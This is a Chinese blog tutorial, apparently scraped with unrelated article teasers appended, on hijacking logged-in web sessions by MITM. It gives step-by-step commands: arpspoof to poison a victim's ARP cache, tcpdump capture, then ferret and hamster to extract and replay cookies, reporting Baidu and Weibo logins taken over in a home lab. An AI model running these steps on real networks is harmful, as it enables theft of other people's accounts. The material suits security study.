关于中间人攻击

中间人攻击(Man-in-the-MiddleAttack,简称"MITM攻击")是一种"间接"的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为"中间人"。

因为FreeBuf几位前辈已经给出了大量的中间人攻击的方法,这里就不再重复了。恰好看到FreeBuf目前没有关于中间人攻击劫持登陆回话的文章,所以就有了下面。

视频下载地址:http://pan.baidu.com/s/1mgicyt6 提取码:o1ws

注:本文提供的攻击测试方法仅供安全学习教学用途,禁止非法使用

关于抓取cookies的手记

要echo下,实现流量的转发,要不目标是上不了网的。

arpspoof 进行arp欺骗

首先抓取包wireshark:选择本地网卡eth0,star抓取流量。

这时候等待用户登录,获取流量信息。获取成功后保存pacp格式。

用ferret加载cookies达到重写流量信息:命令如下:ferret -r chookies.pacp

重写之后生产hamster.txt

这时候运行hamster重放流量,然后代理hettp剩下 的我就不多说了

user。qonze你懂得

0×00

用到的工具是arpspoof tcpdump ferret hamster。

arpspoof 进行ARP欺骗

tcpdump抓去打到本地的数据包

Ferret用来处理抓下来的数据包的

Hamster跟ferret配合使用,提供一个web服务来让我们交互控制。

0×01

拓扑环境:

攻击机:Kali 192.168.1.120

受害机:Windows7 192.168.1.100

网关:192.168.1.1

0×02

我的几个社区帐号都是登录状态,当然未登录也是可以劫持的

先看下我在Kali的机器上是未登录的

0×03

开始arp欺骗

命令:arpspoof -i eth0 -t 192.168.1.1 192.168.1.100

0×04

捕获数据包

命令:tcpdump -i eth0 -w cookie.cap

0×05

模拟受害者登录

受害者在受害机器上就随便刷新一下或者登录一下

完毕

下面我们开始重点

0×06

处理抓去的数据包

ferret -r cookie.cap

自动生成了 hamster.txt

0×07

开启hamster服务

0×08

打开浏览器,使用代理

0×09

打开hamster 浏览器输入http://hamster

选择目标

0x0A

找敏感地址

0x0B

百度劫持成功

微博劫持成功

都成功了

0x0C

我在实验的时候碰见一个问题,就是突然上不到网

下面教大家解决

编辑/etc/NetworkManager/NetworkManager.conf

vi /etc/NetworkManager/NetworkManager.conf

改成true后保存

service network-manager restart

重启服务

中间人攻击之劫持登录会话(cookies)的更多相关文章

  1. 中间人攻击(MITM)姿势总结

    相关学习资料 http://www.cnblogs.com/LittleHann/p/3733469.html http://www.cnblogs.com/LittleHann/p/3738141. ...

  2. 中间人攻击之ettercap嗅探

    中间人攻击: 中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的 ...

  3. MTIM(中间人攻击)

    所谓的MITM攻击就是通过拦截正常的网络通信数据,并进行数据篡改和嗅探,而通信的双方却毫不知情. 信息篡改 当主机A.和主机B通信时,都由主机C来为其“转发”,如图一,而A.B之间并没有真正意思上的直 ...

  4. SSH V2的中间人攻击

    SSH V2的中间人攻击 2012-12-19 10:48:52     我来说两句      作者:Dis9Team 收藏    我要投稿 中间人攻击(Man-in-the-MiddleAttack ...

  5. 中间人攻击 -- Cookie 喷发

    0x00 前言 分享个中间人攻击姿势,屡试不爽. 原本是篇老文,不过写的太啰嗦.今天用简明的文字,重新讲一遍. 0x01 原理 传统 cookie 嗅探,只能获得用户主动访问的站点.不访问就抓不到,效 ...

  6. Android安全之Https中间人攻击漏洞

    Android安全之Https中间人攻击漏洞 0X01 概述   HTTPS,是一种网络安全传输协议,利用SSL/TLS来对数据包进行加密,以提供对网络服务器的身份认证,保护交换数据的隐私与完整性. ...

  7. ARP欺骗与中间人攻击

    前言: 上一篇WPA/WAP2wifi 密码破解笔记说到如何探测附近开放的AP并且破解进入,那么进入别人据局域网我们能干些什么呢?换句话说如果别人进入了我们内部网络,会有什么影响?本文简要介绍了ARP ...

  8. 中间人攻击之arp欺骗 科普ARP欺骗

    中间人攻击之arp欺骗 科普ARP欺骗 A <-> B A中有个ARP Table,每次发包都会在此Table中查找,若找不到,发APR Request包询问.此时若hacker冒充B的M ...

  9. HTTPS中间人攻击实践(原理·实践)

      前言 很早以前看过HTTPS的介绍,并了解过TLS的相关细节,也相信使用HTTPS是相对安全可靠的.直到前段时间在验证https代理通道连接时,搭建了MITM环境,才发现事实并不是我想的那样.由于 ...

随机推荐

  1. 2.1 js 基础--select深入

    select     获取select下的所有option     用op=select.options         option属性:op[1].value,op[1].text;     // ...

  2. step7: 输出到json文件

    调用scrapy自身的Exporter输出 编辑pipeline文件 import json from scrapy.exporters import JsonItemExporter #引入Expo ...

  3. java并发编程(1)并发程序的取消于关闭

    一.任务的取消于关闭 1.中断Thread 1.每个线程都有一个boolean类型的中断状态.true则是中断状态中 interrupt:发出中断请求:isInterrupt:返回中断状态:inter ...

  4. JavaScript中 运算符

    运算符对一个或多个变量或值(操作数)进行运算,并返回一个新值 根据所执行的运算,运算符可分为以下类别: (1) 算术运算符 (2) 比较运算符 运算符 说 明 示 例 ==  等于. 如果两个操作数相 ...

  5. spring框架笔记

    Spring实现依赖注入的两种方式: 1.构造方法注入 2.set方法注入,p标签注入 Spring中事务的两种实现方式: 编程式事务管理 声明式事务管理(推荐) Spring增强类型: Before ...

  6. servlet-mapping元素及其子元素

    <servlet-mapping>元素在Servlet和URL样式之间定义一个映射.它包含了两个子元素<servlet- name>和<url-pattern>,& ...

  7. cygwin 的安装和配置

         Cygwin是一个在windows平台上运行的类UNIX模拟环境,是cygnus solutions公司开发的自由软件(该公司开发的著名工具还有eCos,不过现已被Redhat收购).它对于 ...

  8. AndroidVideoCache 框架源码分析

    1.简析: 在客户端播放视频的使用,容易出现这样的一个问题.在网络状况不好的情况下,视频流很容易卡顿或者中断,即使播放软件本身有一点的缓存能力,但是这个往往不够,造成播放失败,卡顿. AndroidV ...

  9. JavaScript中按键事件的e.keyCode || e.which || e.charCode

    1.浏览器的按键事件 浏览器有3种按键事件——keydown,keypress和keyup,分别对应onkeydown.onkeypress和onkeyup3个事件句柄. 一个典型的按键会产生所有这三 ...

  10. html和css入门 (三)

    文本样式 color 文本颜色 属性名 color 属性值 预定义的颜色名 | 十六进制值的颜色值 | RGB颜色值 默认值 依赖用户代理 描述 设置文本的颜色 direction 文本方向( 属性名 ...